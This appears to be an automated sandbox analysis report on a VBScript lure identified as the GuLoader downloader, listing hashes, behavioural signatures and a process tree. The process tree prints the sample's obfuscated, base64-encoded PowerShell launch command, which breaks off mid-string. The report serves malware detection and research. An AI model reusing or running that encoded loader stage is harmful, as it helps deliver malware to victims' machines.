Analysis
-
max time kernel
90s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2022 03:00
Static task
static1
Behavioral task
behavioral1
Sample
SOLICITUD DE OFERTA.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
SOLICITUD DE OFERTA.vbs
Resource
win10v2004-20220812-en
General
-
Target
SOLICITUD DE OFERTA.vbs
-
Size
181KB
-
MD5
06acdf5de8b3b26b96a9147836decc49
-
SHA1
c7e68cbbe9a5ec40e10a2013512c24e768b0c53a
-
SHA256
12dd0148f02ed0a257b41784311a98b98db4a501f8f94a2b65c5a9bc3cd10451
-
SHA512
c7fcd25d4e87eaba6996fa07e400d426a36ca07e4e9e723f3e03bd60c0bffd3ca9bfaf1e2eeae49cf0dff85eca0c19b66b0a1904099515478725343a79315cef
-
SSDEEP
3072:Fmi1FFbPmgq17iT1Kd5nTuZ6RlZ36CsBFX0FevM8K4Ec5CsW:Fh5rmgqKYn6ZWZ36CsBFXAe3EcwB
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 3208 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4584 powershell.exe 4584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4584 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3208 wrote to memory of 4584 3208 WScript.exe 83 PID 3208 wrote to memory of 4584 3208 WScript.exe 83 PID 3208 wrote to memory of 4584 3208 WScript.exe 83 PID 4584 wrote to memory of 2448 4584 powershell.exe 85 PID 4584 wrote to memory of 2448 4584 powershell.exe 85 PID 4584 wrote to memory of 2448 4584 powershell.exe 85 PID 2448 wrote to memory of 4704 2448 csc.exe 86 PID 2448 wrote to memory of 4704 2448 csc.exe 86 PID 2448 wrote to memory of 4704 2448 csc.exe 86
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABGAHIAaQBnAHIAZQBsAHMAIAA9ACAAQAAnAA0ACgBzAGEAeABvAG4AQQBTAHkAbAB2AGUAZABLAHIAdgBlAGQAZABBAG4AcwBnAGUALQBEAGkAYQB6AG8AVABjAG8AbQBpAGQAeQB1AG4AYwB1AHIAcABUAHkAbgBnAGUAZQBNAGkAYwByAG8AIABWAGkAcgBsAGUALQBSAG8AdAB2AGwAVABLAHIAYQB2AGwAeQBTAHAAaQBsAGQAcABDAHIAdQBuAG8AZQB2AGEAbgBkAHAARABCAHUAdABpAGsAZQBLAGkAbgBpAG4AZgBUAHIAaQB1AG0AaQBVAG4AcABhAHYAbgBHAGEAYgBiAGkAaQBUAGkAbABiAGkAdABHAG8AbwBuAGQAaQBNAGkAYwByAG8AbwBJAG4AdABvAGwAbgBUAGUAIABIAG8AIABNAHkAYwBvAHAAQABTAHQAYQB0AHUAIgAKAFMAYQBjAGMAaAB1AEgAeQBkAHIAYQBzAFYAaQBjAGEAcgBpAFcAbwBiAGwAZQBuAE0AaQBjAHIAbwBnAFQAaQBsAGYAbAAgAEkAbQBpAHQAZQBTAFUAdgByAGQAaQB5AFYAcgBuAGcAIABzAE8AbABpAGUAZgB0AFMAdQBuAHMAZQBlAFQAYQBzAGsAbQBtAGQAZQBzAHQAdQA7AAoATQBhAGkAbgBzAHUAUwB0AGkAdgBuAHMARQB4AHAAZQBkAGkAQwByAGEAZABsAG4ATwB1AHQAcwBoAGcAVAByAHUAcwB0ACAAVgBpAHAAZQByAFMAQQBwAHQAZQByAHkAVgByAGQAaQBmAHMAUgBhAGQAaQB1AHQATABpAHYAcwBhAGUARQBnAG4AcwBwAG0AQgByAGEAZAB5AC4AQwBhAHMAdQBpAFIAUABqAGEAdAB0AHUARgBsAGQAZQBuAG4AVABpAGwAYgBhAHQAUwB2AGsAawBlAGkAUABvAHMAdAB5AG0AQQB2AGUAYwBlAGUAUwBhAG0AbABpAC4AVQBuAHMAdAB1AEkAYQBmAG0AeQBzAG4AZgBvAGQAZwBuAHQAQQBzAHAAIABHAGUATgBlAG0AYQB0AHIAUwBoAGUAdABsAG8AVQBuAGQAZQByAHAARABhAGMAbwBpAFMAUwBxAHUAaQByAGUAQwBvAG4AYwBlAHIATABvAG4AIABCAHYASQBtAGIAZQBsAGkAUwB0AHUAZABpAGMAVAB1AHIAaQBzAGUAcwB0AGIAbwBsAHMAUgBhAHQAdABsADsACgBuAG8AbgBkAGUAcABUAG8AcABlAHAAdQBEAGkAcABhAHMAYgBCAG8AZABkAGgAbABUAHIAaQBzAHQAaQBMAGEAdgBhAGcAYwBMAHUAZgB0AGYAIABEAGsAcwBwAGwAcwBhAGsAdABpAHYAdABuAG8AbgByAGUAYQBUAGkAbgBzAG8AdABGAHIAeQBzAGUAaQBDAHIAeQBwAHQAYwBFAHgAbwByAGIAIABTAGsAYQBhAG4AYwBSAGUAbgBkAGkAbABUAG8AbgBpAG4AYQBTAHQAYQB0AHMAcwBwAGEAcgB0AGkAcwBNAGEAcwBzAGUAIABDAHIAbwBjAG8AUQBWAG8AZwB0AGUAdQBBAG4AaQBzAGEAaQBTAG4AbwB0AG4AcgBBAHIAcgBhAG0AawBQAHIAZQB2AGkAcwBMAGkAZwBlAHMAbwBEAGoAcgB2AGgAMQAKAEwAZQB0AHQAaQB7AEEAcgBiAGkAdABbAFIAYQBhAGQAbABEAFAAYQByAHIAaQBsAEYAZQBzAHQAZABsAEcAcgBhAG0AbQBJAFIAZQBjAGwAYQBtAEsAcgB5AHAAdABwAFAAcgBlAHMAZQBvAFMAdABhAG4AbAByAEsAYQBpAHMAZQB0AFcAdQBzAHMAZQAoAEIAZQB0AG8AbwAiAFMAawBzAHAAbwBnAEsAcgB5AHAAdABkAEYAbwByAHQAeQBpAEYAcgBlAGQAcwAzAG0AdQBzAHMAbwAyAFQAdQBiAGIAaQAiAEMAbABpAGYAdAApAE4AYQBlACAAUwBdAFAAYQByAGkAcwBwAEQAaQBzAGMAbwB1AFMAdwBlAGEAdABiAEMAaQB0AHIAdQBsAEYAbwByAHMAawBpAEMAaAByAGkAcwBjAEIAZQBnAGUAagAgAEwAcwBnAHIAZQBzAFIAZQBuAG8AdgB0AE8AcgBuAGEAbQBhAE8AcgBkAGUAbgB0AHIAaABpAG4AYQBpAGsAbAB1AGsAbABjAEgAZQBsAG0AdQAgAEMAaQBjAGgAbABlAHQAcgBhAGMAawB4AEwAZQB0AGYAbwB0AFUAbgB2AHUAbABlAFMAbQBhAHIAdAByAFAAYQBtAGYAaQBuAFMAawBvAHYAbAAgAFIAZQBuAHQAZQBpAFMAZQBuAHQAaQBuAEEAdwBmAHUAbAB0AEcAZQBtAG0AZQAgAEkAbgB0AGUAcgBQAFMAdABvAHIAawBhAGUAdQBrAGEAcgB0AE4AbwBuAGUAeABoAFAAaQBwAGUAcwBUAEIAZQBzAGwAYQBvAEQAZQBsAGsAbwBSAFMAdABvAHIAbQBlAHAAcgBpAG4AdABnAEMAYQByAGIAdQBpAGsAaQBuAGcAcABvAEkAYQBvACAAQQBuAEEAZgBkAGUAbAAoAFAAcgBvAGcAcgBpAEkAbABkAGUAcgBuAE4AbwBuAHMAcAB0AHMAaABlAGUAcAAgAEoAaQBiAHMAIABTAEEAbABzAGkAZAB5AEYAZABzAGUAbABkAEYAbwB1AGwAYgBhAFYAYQByAGUAdQBtAG0AaQBjAHIAbwBlAEQAYQBnAGUAcwApAFMAaQBrAGsAZQA7AAoAQQBzAHQAcgBhAFsAQgBsAGEAbQBlAEQATQBlAGwAZAByAGwAUwBhAGwAdQB0AGwAUgBvAG8AZgBlAEkAQQBtAGkAbgBvAG0AUgBlAGEAcwBzAHAAQQBuAHQAaQBjAG8AQQBzAGMAbwBwAHIAZABlAGwAYQB3AHQAQQByAG4AZQBzACgARABpAGUAdQB4ACIAUwB0AGUAbQBtAGcASwBhAHAAaQB0AGQAUgBlAGUAbgBzAGkAcwBuAGkAdgB5ADMASABlAHQAZQByADIAUwB0AG8AcgBtACIAVAByAGkAawBvACkARQB4AG8AYwBvAF0AVABqAGEAbABkAHAARQByAGkAYwBoAHUASwBvAHIAcgB1AGIAQQBkAHIAZQBzAGwAQQBuAGMAaAB1AGkAUgBhAG4AZABzAGMARgBhAHYAZQBsACAATgB1AGQAaQBzAHMARQBuAGcAcgBhAHQAQgBvAHUAbgBkAGEASwBhAHYAYQBzAHQASQBuAGkAdABpAGkAQwBlAGkAbABvAGMAUgBhAGsAbABlACAAUgBlAGYAZQByAGUATwB2AGUAcgBhAHgASQBuAGMAbwBtAHQAQQB1AHQAbwBuAGUASABlAG0AaQBwAHIAUAByAGUAYQBkAG4AVQBuAHYAZQByACAAUgBvAHUAZwBoAGkAQQBzAGkAZQBuAG4AVwBpAG4AZABsAHQAVAByAHkAawB0ACAASwBvAG4AcwBlAEcASAB1AG0AYQBuAGUATABhAG4AZwBiAHQARABvAGsAdQBtAEQARQBzAGsAYQBwAGUAYQB0AGgAcgBpAHYAUwB1AGwAcABoAGkAUwBhAG4AdABpAGMAUgBlAGwAYQB0AGUAQgBhAGMAawB3AEMAUABvAHMAdAB1AGEASwBsAG8AYQBrAHAASwBvAGwAbwBuAHMAVQBuAG0AeQB0ACgAaQBtAG0AbwByAGkAQwB1AGIAbABhAG4AUABhAHIAYQBtAHQATgBpAGcAaAB0ACAAUgBlAG0AbwBsAE0AUwBvAG4AbwByAGEAQgB1AHQAaQBrAHMAVABvAHIAbwB1ACwATQBvAGQAaQBsAGkAVQBuAGQAZQByAG4AUwB0AHIAawBtAHQASABvAHIAbgBzACAARABlAG4AdABpAEgAQwBpAHYAZQB0AGUAYgBhAGQAZQBtAG0ARwBhAG4AZwBlAGkARgBuAHkAcwB0AHQAQQBjAHkAYQBuACkAUwB0AGEAdAB1ADsACgBVAG4AdQBzAGEAWwBCAHIAZQBhAGQARABTAGsAcgBwAGUAbABSAHUAbgBkAGUAbABmAG8AcgBlAHMASQBBAHUAdABvAGkAbQBTAHQAYQBuAGQAcABUAHMAdAByAHkAbwBTAGEAbQBiAG8AcgBTAGsAeQBsAGQAdABCAHUAcgBnAG8AKABHAGUAbwByAGcAIgBQAHIAZQBkAGkAawBBAHUAZABpAG8AZQBDAGUAcgBjAGkAcgBHAHkAbQBrAGgAbgBVAGQAZwBpAHYAZQBBAHIAawBpAHQAbABVAGQAawBvAG4AMwBDAG8AaQBuAHMAMgBGAGwAZQBtAG0AIgBBAGQAdQBsAHQAKQBWAG8AawBzAGUAXQBSAGUAYgB1AGsAcABGAG8AcgBiAGkAdQBQAGEAdwBuAGIAYgBSAGUAZgBlAHIAbABHAGUAbgBlAHIAaQBGAGUAcgBpAGUAYwBEAGUAYQBsAHMAIABBAHQAdABlAG4AcwBVAHAAZwBhAG4AdABPAGYAZgBlAG4AYQBEAGEAYQBiAHMAdABWAGEAcgBtAGUAaQBQAGEAcgBhAGMAYwBTAHQAdQBiAGIAIABLAHIAbwBuAGUAZQBTAGkAawBrAGUAeABTAGsAYQB0AGUAdABBAGYAZwByAGUAZQBFAHAAZQBuAGQAcgBTAHAAbwByAHYAbgBTAG4AeQBsAHQAIABTAG4AYQBwAHMAaQBUAHIAZQBmAG8AbgBTAGkAYwBpAGwAdABTAHAAaQByAGEAIABFAGwAdgBlAHIATABVAHIAdQBnAHUAbwBGAGkAZwB1AHIAYQBUAHIAZQByAHUAZABPAG0AZwBhAG4ATABUAGUAbQBwAGUAaQBWAHIAZABpAHMAYgBSAGUAYQBhAGwAcgBQAHIAZQBkAGkAYQBBAG4AaQBtAGUAcgBVAG4AYwBvAG4AeQBzAG4AaQBmAGYAKABMAGEAbgBvAHMAaQBSAGkAbgBnAGIAbgBKAGUAdABzAHQAdABzAHAAZQBqAGwAIABLAHIAeQBzAHQAUwBHAHIAdQBiAGIAawBGAG8AZQBkAGUAYQBBAHIAYgBlAGoAdABOAG8AdABlAGQAdABNAGUAZABiAG8AKQBGAG8AcgBlAGQAOwAKAE4AZQBiAHUAbABbAEsAbABvAGsAawBEAEEAdAB0AGUAbgBsAFAAdQBwAHAAZQBsAGEAZgBmAGEAbABJAFcAbwBvAGwAZQBtAFUAZABsAG8AcwBwAE8AdQB0AGYAaQBvAEYAZQBuAHUAZwByAEUAbABsAGEAbgB0AEEAdABhAHIAaQAoAFMAcABvAG8AbgAiAGYAYQByAG0AcwBrAGgAYQBpAHIAbABlAFMAcABlAG4AYwByAFAAYQByAHQAbgBuAFMAbgBrAG4AaQBlAFIAZQBzAGsAbgBsAEQAaQBhAHMAcAAzAEoAZQBiAGUAbAAyAEkAbQBwAGEAcgAiAEYAaQBkAGcAZQApAE8AbQBnAG4AZwBdAFAAcgBlAGEAYwBwAEQAYQB5AGwAaQB1AEYAbwByAGIAcgBiAEYAbABhAGcAZQBsAEwAZQB0ACAAQgBpAEEAZgBrAHIAaQBjAFMAcABlAGsAdAAgAEgAbwBtAG8AcwBzAE4AbwBuAGMAbwB0AFMAaQB0AHQAcgBhAEkAbgBkAHQAcgB0AFAAYQByAGsAZQBpAFAAYQByAGEAbQBjAEEAYgBiAHIAZQAgAHMAZQBsAHYAZgBlAEYAdQBnAGwAZQB4AFQAcgBpAHUAbQB0AFQAdQBnAHQAZQBlAFQAYQBiAG8AcAByAEsAbgBhAGwAZABuAHIAZQBjAHIAbwAgAEkAbgB0AGUAcgBpAFMAdAByAGEAaQBuAEYAbABvAHIAZQB0AFMAbwBqAGEAawAgAFQAYQBuAGsAZQBTAEsAcgBvAGsAZQBlAEEAcgByAGEAbgB0AFIAbwBjAGsAZQBWAFAAbABhAGQAZQBvAEYAbwByAHIAYQBsAEQAbQByAGkAbgB1AFMAdABkAHAAdQBtAFQAawBrAGUAbABlAFMAcAByAGcAZQBMAEsAbgBpAHAAbABhAEEAbQBtAHUAbgBiAE0AYQBjAGEAYwBlAEIAbwByAGQAZQBsAEIAbwBnAHMAdAAoAE0AZQBuAHUAcgBpAFMAdQBiAHMAdABuAEMAbwByAGkAbgB0AEMAbwByAG4AZQAgAGEAbgB0AGkAdwBzAFoAYQBuAG4AZQBhAFAAcgBvAGoAZQB1AE0AbwB1AHMAZQAsAEIAYQBkAG4AZQBpAEMAaABhAHAAZQBuAFMAbwBkAGEAdgB0AEYAaQByAGwAaQAgAFQAZQBrAHMAdABDAE0AZQB6AHoAbwBvAFQAaQBsAHIAZwBuAG0AYQBzAGsAaQB0AEsAYQBuAGQAaQBhAFIAZQBpAG4AdwApAFQAaAB1AGQAZAA7AAoATQBhAGgAYQByAFsAUgBlAHQAcwBrAEQASABhAGMAawBiAGwARgBhAG4AZQBiAGwAQQBtAHIAZQBlAEkAVABlAG0AYQAgAG0AVQBkAGIAeQB0AHAATgBvAG4AcwB1AG8AUgBvAGMAawB3AHIARQB4AHQAZQBuAHQASQBuAGQAZQBuACgAYwBvAG0AcABlACIARQBlAGwAcABvAHUASABhAGwAZgB1AHMARQB5AGUAcwB0AGUATwBuAGMAbwBsAHIARgBvAHIAdAB5ADMAUABlAHIAagB1ADIAZgBvAHIAcwB2ACIASQBuAHQAZQByACkAUwBhAG0AbQBlAF0ATQBpAGwAZABsAHAAVQByAG8AawBrAHUASwBsAGkAbgBnAGIAVAByAGEAcABhAGwAYgB1AHIAbABlAGkAVgBvAG4AcwAgAGMAcwBvAGwAZgBhACAARQB4AG8AcgBoAHMAQQBuAHQAaABpAHQAQgBsAGEAbgBrAGEAQQBuAHQAaQBtAHQARQBqAGUAbgBkAGkASwB2AHMAdABlAGMASABvAHMAcABpACAARgBvAHIAYgB1AGUASABvAHYAZQBkAHgAQwBhAGwAYwBpAHQASABvAHYAZQBkAGUAWgBpAHIAYwBvAHIATwB1AHQAdABvAG4AbwB2AGUAcgB0ACAASQBkAGMAdQBlAGkATABvAHUAcABlAG4AUABzAGUAdQBkAHQAUABvAGwAbwBuACAAQgByAHkAbgBqAE8AUwBhAGwAdABvAHAAUwBjAGEAbABmAGUATwBwAGgAaQB0AG4AVABpAGwAcwB0AFcAbwBwAG0AcgBrAGkARwByAG8AdAB0AG4AQwBoAGUAZwBvAGQAUAB1AHIAYgBlAG8AUwBlAGwAdgBmAHcARgByAGEAdABlAFMAUAByAGEAYwB0AHQAVQBkAHMAawByAGEARgByAHUAZwB0AHQARABlAGsAYQBnAGkAQQBiAHUAcwBlAG8AUwB0AGUAbQBwAG4ATwB1AHQAYgBiACgAUAByAGUAYQBjAGkAVQBkAG8AawB1AG4AQQBiAG8AdQBuAHQARgB1AHMAaQBvACAAVAByAGEAbgBzAFQAUwBhAHQAaQByAGkARgBvAGwAawBlAGcARQBwAGkAbgBhAGcATwBwAHAAcgBlACwATwBtAGQAYgB0AGkAQQB1AGsAdABpAG4AUwBwAGgAaQBuAHQARQBuAHQAZQByACAAUABoAGEAbgBlAHUAUAByAGUAZABpAGQAUgBvAHQAdQBuAG4ASwBhAGwAZABlAHYAZABhAGcAaQBuAG4ATQBhAGMAcgBvACwAdgBhAG4AbQBkAGkAUwBhAGwAYQBhAG4AUwB0AGUAbQBtAHQARABlAGsAbABhACAAUABvAHMAdABuAE0ARgBuAGcAcwBlAGUAQQBuAG4AYQBtAGQAUgBlAHMAbwBuAGIAQwBpAHYAaQBsACkASgBhAG4AbwBzADsACgBSAG8AZABsAHMAWwBEAGkAcwB0AGkARABTAHQAaQBsAGUAbABEAHUAbgBjAGkAbABCAGEAbgBkAGEASQBSAGgAbwBuAGMAbQBTAHQAZQBtAG4AcABBAGYAbABiAHMAbwBEAGUAbQBlAHIAcgBHAGUAcgByAGkAdABZAGQAZQByAGcAKABNAGkAYwByAG8AIgBTAGkAbABlAHQAawBBAGsAaABtAGkAZQBGAGEAcgBhAGQAcgBBAHQAYQByAGEAbgBrAHIAYQBrAGsAZQBVAG4AdgBpAGIAbABBAHIAYgBvAHIAMwBSAG8AdwBpAG4AMgBNAGUAcwBpAG8AIgBSAGUAcwBlAG4AKQBUAGUAbABlAG4AXQBKAGkAZwBnAGwAcABUAGEAYgBpAHQAdQBHAHIAdQBuAGQAYgBHAGEAcgBkAGkAbABHAGEAaQBsAGwAaQBTAHQAYQBuAGcAYwBVAG4AcwBlAG4AIABUAGkAbABmAGwAcwBGAG8AcgBsAGEAdABSAGEAbQBoAGUAYQBzAGEAbgBhAHQAdABDAG8AcgByAG8AaQBHAG8AZABkAGEAYwBHAGcAbABlAHIAIABMAHUAZgB0AGsAZQBQAG4AZQB1AG0AeABLAGEAbgBjAGUAdABCAGEAcgBrAHMAZQBQAG8AbABhAHIAcgBHAHIAdQBuAGQAbgBFAG4AaQBzAGwAIABUAHIAYQBhAGQAaQBTAGUAcgB2AG8AbgBDAGEAbAB2AGkAdABwAGEAcgBhAG0AIABUAHIAbwBsAGQARwBTAG0AbQBlAHMAZQBiAGUAbQBhAG4AdABTAHQAZQBlAHAAVQBTAGEAbgBkAHcAcwBBAG4AZwB1AGkAZQBGAGEAbQBpAGwAcgBSAGkAbwB0AGkARABFAGYAdABlAHIAZQBWAHUAcgBkAGUAZgB0AGUAbgBhAG4AYQBOAG8AbgBpAG0AdQBPAHYAZQByAGEAbABNAGEAdgBlAHIAdABCAGkAZwBhAG0ATABFAG4AdABvAG0AQwBjAG8AbABvAG4ASQBPAHYAZQByAHYARABEAGEAdABhAGcAKABVAGQAcwBsAHkAKQBBAHUAcgBpAGsAOwAKAGcAZQByAHkAIABbAEsAaQBkAG4AYQBEAFYAcgBkAGkAdABsAHUAbgB1AHMAZQBsAE8AYgBzAHQAZQBJAEYAbwByAHMAdABtAFIAbwBzAGUAdwBwAEUAZwBhAGwAaQBvAFUAbgBpAHgAIAByAFMAdgBlAGoAcwB0AEEAZgBhAGMAaQAoAFQAaQBsAGcAbgAiAGEAYQByAHMAYQBrAFMAawByAGkAZABlAE0AZQB0AGEAcwByAHMAdgB2AG4AaQBuAEkAYwBlAGIAZQBlAEIAZQBhAHQAYQBsAEwAYQB0AHQAZQAzAE4AbwBuAHAAbAAyAEMAZQBsAGwAbwAiAEYAZQBsAHQAbwApAEUAZgB0AGUAcgBdAE0AbwBkAHIAZQBwAEEAbgBhAGwAeQB1AEIAYQByAGIAaQBiAFYAawBrAGUAbABsAHUAZABzAG8AbgBpAEQAZQBjAGkAZABjAFMAdABlAGcAZQAgAE4AYQBnAGwAZQBzAEEAYgBhAGwAYQB0AEoAbwBsAHQAcABhAGEAbABwAGEAawB0AGQAZQBtAGEAcgBpAGIAbwBjAGMAaQBjAE4AeQBoAGUAZAAgAEcAYQBuAGoAYQBlAFAAYQByAHQAcgB4AEcAcgBvAHQAaQB0AEYAaQByAGUAZABlAEEAYgBhAHMAaAByAE0AaQBjAGgAZQBuAEUAeABjAHUAcgAgAEMAbwBsAGwAaQBJAEUAdQB0AHIAbwBuAFMAYwBvAHIAZQB0AEEAegBvAHQAaQBQAEsAcgBvAG4AaQB0AFAAeQByAGEAbgByAFIAZQBnAGkAbQAgAEMAYQBwAHIAaQBFAFUAbgBpAG4AaQBuAFAAYQByAG0AbwB1AE0AeQBzAHQAaQBtAEMAbwBuAHQAcgBTAEIAYQBsAG8AdwB5AFMAdABlAHIAbgBzAEEAbgB0AGkAbAB0AFAAbABhAGkAcwBlAEIAcgBpAHMAdABtAEIAcgBvAHcAZABMAGUAbgBkAG8AbABvAHQAbwByAHQAaQBjAEkAbgBzAGMAcgBhAEYAbwByAHMAawBsAE0AbwBsAGEAcgBlAEEAawB0AHUAYQBzAEEAYwByAGkAdABBAFMAdQBzAHAAZQAoAFMAcABlAGQAaQB1AFcAcgBpAHQAaABpAFAAbwB1AHIAcQBuAE0AaQBzAHMAZQB0AEEAbABwAGUAbgAgAFAAYQB0AHQAZQB2AEUAbABtAGUAdAAxAEEAcwBuAGUAcgAsAFIAZQBpAG4AdABpAEsAbwBnAGwAZQBuAEsAbwBpAG4AYwB0AFAAaQBiAGUAawAgAFUAbgBnAGkAbAB2AEkAbgB0AGUAcgAyAEQAdQBwAGwAaQApAEsAYQBnAGUAcwA7AAoAQgBlAG4AegBhAFsASgBvAHIAZAByAEQATQBvAGQAaABhAGwAVQBuAGIAZQBuAGwAVABlAGsAcwB0AEkATwBwAGwAcgBpAG0AUwB0AHIAYQBuAHAAQwBoAHIAbwBtAG8AQQB0AHQAYQBjAHIAVwBhAHkAegBnAHQARQBwAGkAcwB0ACgARwBlAG4AZQByACIAVgByAGkAbABsAHUAQQBmAHIAdQBuAHMATwBwAHAAdQBnAGUASABlAG0AbQBlAHIAQwBvAGUAbgBvADMASwBvAG0AYgBpADIAQQBiAGUAYQBtACIAQQB6AG8AdABlACkAbABhAGQAZQBnAF0AQQBsAGwAaQBnAHAATgBvAHQAZQBmAHUAVABpAG4AZwBmAGIAQwBlAHQAcgBhAGwAVABlAG8AbABvAGkAVABlAGcAdQBsAGMAQQBuAGkAcwBvACAAUAByAG8AZwByAHMAUwBlAGwAdgBiAHQAUwBrAGkAZABlAGEASQB2AGEAbABvAHQAWQBuAGsAdgByAGkARABvAGwAbABpAGMARwByAHUAbgBkACAARABlAG8AZABvAGUAUwB0AHIAaQBzAHgARgBpAGIAcgBvAHQAQgBpAGwAaQB0AGUAQwBoAGEAbQBiAHIAVQBkAG0AYQB0AG4AQgBpAGIAbABpACAAUwB2AG8AdgBsAGkAUwBvAGMAaQBhAG4AcwB5AGwAZABzAHQATABhAGIAcgBhACAATgBlAG8AbwByAEcATABuAGcAZABlAGUASQBuAGYAbwByAHQATAB5AG4AYQBzAEMARgBvAHIAZQBiAGwASwB1AGwAdAB1AGEAVAByAGUAbQBvAHMAVQBnAGUAbQBhAHMAUABhAHIAbwBsAEwAUgBlAHQAdwBpAG8AUABlAHAAdABvAG4ARwB2AGkAbgBrAGcARwBhAHIAZwBhACgARgB1AGcAdABpAGkASwBsAGEAcgBoAG4ARgBvAHIAaABhAHQATgB5AHQAdABlACAATgBhAGsAYQB5AFIATQBpAGMAZQBsAGUAUwB5AG4AbwBkAHYAUwBsAG8AbQBtAGkASwBhAHIAZwBhAGwAQgBlAGsAbABhAGUAbgBvAG4AdwBhACwAVQBzAGUAbABzAGkAQgB1AGcAaQAgAG4ASABqAGUAcwB0AHQASQBuAGYAbAB1ACAATwB0AGgAZQByAFIARgBsAGUAdAB0AGUAVQBuAHMAZQBuAGgAVABlAGEAdAByAG8ASABvAHYAZQBkAGkAVQBkAHMAdAB0AHMAUAB1AHIAIABGACkAUAB1AHAAaQB2ADsACgBSAGUAaABhAHIAWwBOAG8AbgBkAGUARABUAGEAcgBpAGsAbABTAGUAbQBlAHMAbABWAGkAZQB0AGMASQBIAGUAeABhAGIAbQBFAGYAZgBsAGEAcAB0AHIAaQBnAHMAbwBEAGkAcwBnAHIAcgBQAGUAcgBzAG8AdABTAGsAdQBsAGsAKABGAG8AcgB0AGoAIgBCAG8AZQByAG4AawBMAGEAbgBnAHQAZQBQAHMAeQBjAGgAcgBWAGkAcgBrAG4AbgBCAGkAbwBlAGMAZQBVAG4AcwB0AG8AbABTAGsAbwBsAGUAMwBGAG8AcgBlAG4AMgBDAGEAcgBwAGUAIgBUAHIAYQBkAGkAKQBLAG8AZwBsAGUAXQBTAHUAYgBhAHIAcABHAGwAZQBkAGcAdQBVAG4AYwBoAGUAYgBaAHkAZwBvAHMAbABCAGEAbABhAG4AaQBPAHYAZQByAHQAYwBzAHAAbwByAHQAIABDAG8AbQBtAGkAcwBiAGUAcwBvAHYAdABPAHAAZQByAGMAYQBEAGkAbQBpAHQAdABGAG8AbABpAGwAaQBSAGQAbQBlAGQAYwBEAGEAdABhAHQAIABCAGkAcgBsAGUAZQBEAGEAeQBhAGIAeAByAGUAYwBvAHIAdABhAHQAcgBlAGIAZQBGAG8AcgBlAHMAcgBLAHIAbwBwAHMAbgBOAGEAdAB1AHIAIABwAGEAcgBhAGwAaQBIAG8AbQBlAGwAbgBVAGQAdAByAHkAdABjAGwAYQB1AGQAIABCAHIAZQBtAHMAVgBEAGkAYQBnAG4AaQBFAGwAZgBlAG4AcgBGAGkAbgBnAGUAdABzAHIAdABpAGwAdQBMAGkAZwBhAGUAYQBSAGUAdABzAG0AbABEAGUAYwBlAG0AQQBTAHQAaQBsAGkAbABuAGUAZwBsAGUAbABGAGkAcgBlAHIAbwBqAGEAYwBrAHIAYwBUAHIAeQBrAGwAKAByAGUAZABpAHMAaQBQAGUAcgBpAG8AbgBSAHUAbgBkAHQAdABDAG8AaQBzAHQAIABOAGEAYgBhAGwAdgBFAGQAbQBhAHMAMQBTAGIAbABhAGQALABLAHIAaQBnAGUAaQBlAGYAZgBlAHQAbgBNAHUAbgBkAHMAdABBAHUAdABvAG8AIABWAGEAcgBtAHQAdgBGAGoAZQByAG4AMgBPAGwAYQB2AHMALABTAG0AaQB0AGkAaQBCAGEAZwBzAGkAbgBBAHMAeQBtAHAAdABjAG8AdQByAHQAIABEAGUAdABvAHgAdgBDAG8AbgBuAG8AMwBCAGEAcwBpAGQALABJAG0AcAByAG8AaQBiAGUAcgBhAGsAbgBDAGEAYwBvAGwAdABUAGkAbAB0AHIAIABGAG8AcgBkAHkAdgBSAGUAZwBpAG0ANABGAHIAbwBzAHMAKQBkAGkAcABoAGUAOwAKAEsAeQB0AG8AbwBbAFAAbABlAHUAcgBEAEYAYQBzAHQAZQBsAEMAaABpAGYAcgBsAEkAbgBmAG8AcgBJAFMAdQBwAGUAcgBtAGsAYQB0AHQAZQBwAE4AZQB1AHIAbwBvAFAAYQBuAHMAYwByAEIAdQBrAGwAZQB0AEYAdQBtAGEAcgAoAFIAZQBjAHQAaQAiAFUAbgBkAGUAcgB3AFIAZQB0AHIAYQBpAEcAcgBpAHMAawBuAFQAcgBuAGUAdABzAEEAawBhAGQAZQBwAEEAbgBpAG8AbgBvAFQAYQBwAGgAdQBvAFQAZQBsAGUAcABsAEgAeQBzAHQAZQAuAFMAawBhAGwAYQBkAEEAYQBiAGUAbgByAEsAYQBmAGYAZQB2AFQAaQBsAGcAbwAiAE0AbwB2AGUAcgApAFIAZQBsAGEAdABdAEEAdAB0AHIAYQBwAEgAYQBuAGQAcwB1AEwAZQBwAHQAbwBiAGUAcgBpAHQAcgBsAHAAcwBlAHUAZABpAFAAcgBvAHAAaABjAGgAbwBhAGMAdAAgAFAAbABlACAARgBzAEMAbwBsAG8AcgB0AEQAaQBhAHQAbwBhAGEAbABpAHkAYQB0AFQAaQBlAHIAYwBpAEUAbgBxAHUAaQBjAFMAeQBkAGcAYQAgAEgAbwBmAGwAZQBlAFUAZgBvAHIAZAB4AEIAaQBmAGkAZAB0AEQAYQBhACAAVgBlAEMAYQByAG8AYQByAHIAZQBzAGUAYwBuAFMAaQBnAGkAbAAgAFAAYQByAGMAZQBpAFMAdABvAGMAawBuAEIAbwBuAGkAZgB0AEwAZQBpAHMAdQAgAEkAcwBjAGgAZQBFAGMAYQByAHIAeQBuAEIAYQBjAGkAIABkAEkAbgB2AGUAcwBQAEwAbgBzAHQAaQBhAFQAZQBlAHQAbw